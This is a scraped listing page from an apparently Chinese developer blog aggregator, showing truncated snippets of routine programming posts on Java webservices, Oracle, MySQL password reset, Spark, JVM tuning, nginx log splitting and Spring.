    做Java的经常在选择Webservice框架上徘徊很久,Axis  Xfire Axis2 CXF ,他们只有一个功能,发布HTTP服务然后用XML做数据传输。 是的,他们就做了两个功能,发布一个http服务让客户端或者浏览器连接,接收xml参数并发送xml结果。 当在不同的平台间传输数据时,就需要一个都能解析的数据格式。 但是为什么要使用xml呢?不能使json或者其他通用数据
  • js年份下拉框 3213213333332132 java web ee
    <div id="divValue">test...</div>测试 //年份 <select id="year"></select> <script type="text/javascript"> window.onload =
  • 简单链式调用的实现技术 归来朝歌 方法调用链式反应编程思想
    在编程中,我们可以经常遇到这样一种场景:一个实例不断调用它自身的方法,像一条链条一样进行调用 这样的调用你可能在Ajax中,在页面中添加标签: $("<p>").append($("<span>").text(list[i].name)).appendTo("#result");   也可能在HQ
  • JAVA调用.net 发布的webservice 接口 darkranger webservice
    /** * @Title: callInvoke * @Description: TODO(调用接口公共方法) * @param @param url 地址 * @param @param method 方法 * @param @param pama 参数 * @param @return * @param @throws BusinessException
  • Javascript模糊查找 | 第一章 循环不能不重视。 aijuans Way
    最近受我的朋友委托用js+HTML做一个像手册一样的程序,里面要有可展开的大纲,模糊查找等功能。我这个人说实在的懒,本来是不愿意的,但想起了父亲以前教我要给朋友搞好关系,再加上这也可以巩固自己的js技术,于是就开始开发这个程序,没想到却出了点小问题,我做的查找只能绝对查找。具体的js代码如下: function search(){ var arr=new Array("my
  • 狼和羊,该怎么抉择 atongyeye 工作
    狼和羊,该怎么抉择 在做一个链家的小项目,只有我和另外一个同事两个人负责,各负责一部分接口,我的接口写完,并全部测联调试通过。所以工作就剩下一下细枝末节的,工作就轻松很多。每天会帮另一个同事测试一些功能点,协助他完成一些业务型不强的工作。 今天早上到公司没多久,领导就在QQ上给我发信息,让我多协助同事测试,让我积极主动些,有点责任心等等,我听了这话,心里面立马凉半截,首先一个领导轻易说
  • 读取android系统的联系人拨号 百合不是茶 androidsqlite数据库内容提供者系统服务的使用
           联系人的姓名和号码是保存在不同的表中,不要一下子把号码查询来,我开始就是把姓名和电话同时查询出来的,导致系统非常的慢   关键代码:     1, 使用javabean操作存储读取到的数据 package com.example.bean; /** * * @author Admini
  • ORACLE自定义异常 bijian1013 数据库自定义异常
    实例: CREATE OR REPLACE PROCEDURE test_Exception ( ParameterA IN varchar2, ParameterB IN varchar2, ErrorCode OUT varchar2 --返回值,错误编码 ) AS /*以下是一些变量的定义*/ V1 NUMBER; V2 nvarc
  • 查看端号使用情况 征客丶 windows
    一、查看端口 在windows命令行窗口下执行: >netstat -aon|findstr "8080" 显示结果: TCP     127.0.0.1:80         0.0.0.0:0    &
  • 【Spark二十】运行Spark Streaming的NetworkWordCount实例 bit1129 wordcount
    Spark Streaming简介   NetworkWordCount代码   /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with
  • Struts2 与 SpringMVC的比较 BlueSkator struts2spring mvc
    1. 机制:spring mvc的入口是servlet,而struts2是filter,这样就导致了二者的机制不同。 2. 性能:spring会稍微比struts快。spring mvc是基于方法的设计,而sturts是基于类,每次发一次请求都会实例一个action,每个action都会被注入属性,而spring基于方法,粒度更细,但要小心把握像在servlet控制数据一样。spring
  • Hibernate在更新时,是可以不用session的update方法的(转帖) BreakingBad Hibernateupdate
    地址:http://blog.csdn.net/plpblue/article/details/9304459 public void synDevNameWithItil() {Session session = null;Transaction tr = null;try{session = HibernateUtil.getSession();tr = session.beginTran
  • 读《研磨设计模式》-代码笔记-观察者模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; import java.util.Observable; import java.util.Observer; /** * “观
  • 重置MySQL密码 chenhbc mysql重置密码忘记密码
    如果你也像我这么健忘,把MySQL的密码搞忘记了,经过下面几个步骤就可以重置了(以Windows为例,Linux/Unix类似): 1、关闭MySQL服务 2、打开CMD,进入MySQL安装目录的bin目录下,以跳过权限检查的方式启动MySQL mysqld --skip-grant-tables  3、新开一个CMD窗口,进入MySQL mysql -uroot  
  • 再谈系统论,控制论和信息论 comsci 设计模式生物能源企业应用领域模型
                               再谈系统论,控制论和信息论     偶然看
  • oracle moving window size与 AWR retention period关系 daizj oracle
    转自: http://tomszrp.itpub.net/post/11835/494147 晚上在做11gR1的一个awrrpt报告时,顺便想调整一下AWR snapshot的保留时间,结果遇到了ORA-13541这样的错误.下面是这个问题的发生和解决过程. SQL> select * from v$version; BANNER -------------------
  • Python版B树 dieslrae python
    话说以前的树都用java写的,最近发现python有点生疏了,于是用python写了个B树实现,B树在索引领域用得还是蛮多了,如果没记错mysql的默认索引好像就是B树... 首先是数据实体对象,很简单,只存放key,value class Entity(object): '''数据实体''' def __init__(self,key,value)
  • C语言冒泡排序 dcj3sjt126com 算法
    代码示例: # include <stdio.h> //冒泡排序 void sort(int * a, int len) { int i, j, t; for (i=0; i<len-1; i++) { for (j=0; j<len-1-i; j++) { if (a[j] > a[j+1]) // >表示升序
  • 自定义导航栏样式 dcj3sjt126com 自定义
    -(void)setupAppAppearance { [[UILabel appearance] setFont:[UIFont fontWithName:@"FZLTHK—GBK1-0" size:20]]; [UIButton appearance].titleLabel.font =[UIFont fontWithName:@"FZLTH
  • 11.性能优化-优化-JVM参数总结 frank1234 jvm参数性能优化
    1.堆 -Xms --初始堆大小 -Xmx --最大堆大小 -Xmn --新生代大小 -Xss --线程栈大小 -XX:PermSize  --永久代初始大小 -XX:MaxPermSize  --永久代最大值 -XX:SurvivorRatio --新生代和suvivor比例,默认为8 -XX:TargetSurvivorRatio --survivor可使用
  • nginx日志分割 for linux HarborChung nginxlinux脚本
    nginx日志分割 for linux 默认情况下,nginx是不分割访问日志的,久而久之,网站的日志文件将会越来越大,占用空间不说,如果有问题要查看网站的日志的话,庞大的文件也将很难打开,于是便有了下面的脚本   使用方法,先将以下脚本保存为 cutlog.sh,放在/root 目录下,然后给予此脚本执行的权限   复制代码代码如下: chmo
  • Spring4新特性——泛型限定式依赖注入 jinnianshilongnian springspring4泛型式依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • centOS安装GCC和G++ liuxihope centosgcc
    Centos支持yum安装,安装软件一般格式为yum install .......,注意安装时要先成为root用户。 按照这个思路,我想安装过程如下: 安装gcc:yum install gcc 安装g++: yum install g++ 实际操作过程发现,只能有gcc安装成功,而g++安装失败,提示g++ command not found。上网查了一下,正确安装应该
  • 第13章 Ajax进阶(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • How to determine BusinessObjects service pack and fix pack blueoxygen BO
    http://bukhantsov.org/2011/08/how-to-determine-businessobjects-service-pack-and-fix-pack/   The table below is helpful. Reference   BOE XI 3.x 12.0.0. y BOE XI 3.0 12.0. x. y BO
  • Oracle里的自增字段设置 tomcat_oracle oracle
     大家都知道吧,这很坑,尤其是用惯了mysql里的自增字段设置,结果oracle里面没有的。oh,no   我用的是12c版本的,它有一个新特性,可以这样设置自增序列,在创建表是,把id设置为自增序列 create table t ( id       number generated by default as identity (start with 1 increment b
  • Spring Security(01)——初体验 yang_winnie springSecurity
    Spring Security(01)——初体验     博客分类: spring Security Spring Security入门安全认证        首先我们为Spring Security专门建立一个Spring的配置文件,该文件就专门用来作为Spring Security的配置
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他